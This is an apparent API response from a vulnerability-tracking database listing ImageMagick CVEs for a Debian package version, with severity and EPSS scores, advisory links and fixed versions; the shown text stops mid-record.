Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/1026113?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "type": "deb", "namespace": "debian", "name": "imagemagick", "version": "8:6.9.11.60+dfsg-1.3+deb11u4", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "8:6.9.11.60+dfsg-1.6+deb12u8", "latest_non_vulnerable_version": "8:7.1.2.19+dfsg1-1", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/22040?format=api", "vulnerability_id": "VCID-15ny-qqbj-qyfk", "summary": "ImageMagick has infinite loop when writing IPTCTEXT leads to denial of service via crafted profile\nA crafted profile contain invalid IPTC data may cause an infinite loop when writing it with `IPTCTEXT`.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26066.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26066.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26066", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04791", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04757", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04617", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04608", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04641", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04658", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04675", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.0468", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04669", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04635", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04599", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04623", "published_at": "2026-04-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26066" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26066", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26066" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/880057ce34f6da9dff2fe3b290bbbc45b743e613", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/880057ce34f6da9dff2fe3b290bbbc45b743e613" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v994-63cg-9wj3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v994-63cg-9wj3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26066", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26066" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442142", "reference_id": "2442142", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442142" }, { "reference_url": "https://github.com/advisories/GHSA-v994-63cg-9wj3", "reference_id": "GHSA-v994-63cg-9wj3", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v994-63cg-9wj3" }, { "reference_url": "https://usn.ubuntu.com/8127-1/", "reference_id": "USN-8127-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8127-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-26066", "GHSA-v994-63cg-9wj3" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-15ny-qqbj-qyfk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/22659?format=api", "vulnerability_id": "VCID-1cpn-zvem-v7gt", "summary": "ImageMagick has uninitialized pointer dereference in JBIG decoder\nAn uninitialized pointer dereference vulnerability exists in the JBIG decoder due to a missing check.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28691.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28691.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28691", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17474", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17414", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17322", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17542", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17495", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18746", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18975", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18928", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18877", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.1883", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18843", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18858", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28691" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28691", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28691" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wj8w-pjxf-9g4f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T15:58:48Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wj8w-pjxf-9g4f" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28691", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28691" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445902", "reference_id": "2445902", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445902" }, { "reference_url": "https://github.com/advisories/GHSA-wj8w-pjxf-9g4f", "reference_id": "GHSA-wj8w-pjxf-9g4f", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wj8w-pjxf-9g4f" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6713", "reference_id": "RHSA-2026:6713", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6713" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-28691", "GHSA-wj8w-pjxf-9g4f" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1cpn-zvem-v7gt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/22155?format=api", "vulnerability_id": "VCID-29r3-kvf4-n3hc", "summary": "ImageMagick: Heap Buffer Over-read in WaveletDenoise when processing small images\nA heap buffer over-read vulnerability occurs when processing an image with small dimension using the `-wavelet-denoise` operator.\n\n```\n==3693336==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x511000001280 at pc 0x5602c8b0cc75 bp 0x7ffcb105d510 sp 0x7ffcb105d500\nREAD of size 4 at 0x511000001280 thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27798.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27798.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27798", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02733", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02808", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02818", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02704", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02694", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02713", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02763", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.0274", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02717", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02743", "published_at": "2026-04-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27798" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27798", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27798" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:54:43Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/0377e60b3c0d766bd7271221c95d9ee54f6a3738", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:54:43Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/0377e60b3c0d766bd7271221c95d9ee54f6a3738" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qpgx-jfcq-r59f", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:54:43Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qpgx-jfcq-r59f" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27798", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27798" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442872", "reference_id": "2442872", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442872" }, { "reference_url": "https://github.com/advisories/GHSA-qpgx-jfcq-r59f", "reference_id": "GHSA-qpgx-jfcq-r59f", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qpgx-jfcq-r59f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-27798", "GHSA-qpgx-jfcq-r59f" ], "risk_score": 3.2, "exploitability": "0.5", "weighted_severity": "6.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-29r3-kvf4-n3hc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24115?format=api", "vulnerability_id": "VCID-2gw3-qfan-jygd", "summary": "ImageMagick's failure to limit the depth of SVG file reads caused a DoS attack\nUsing Magick to read a malicious SVG file resulted in a DoS attack.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68618.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68618.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68618", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27692", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.2775", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27794", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27816", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27809", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27868", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.28008", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27908", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27867", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.278", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.2791", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.27966", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68618" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68618", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68618" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": 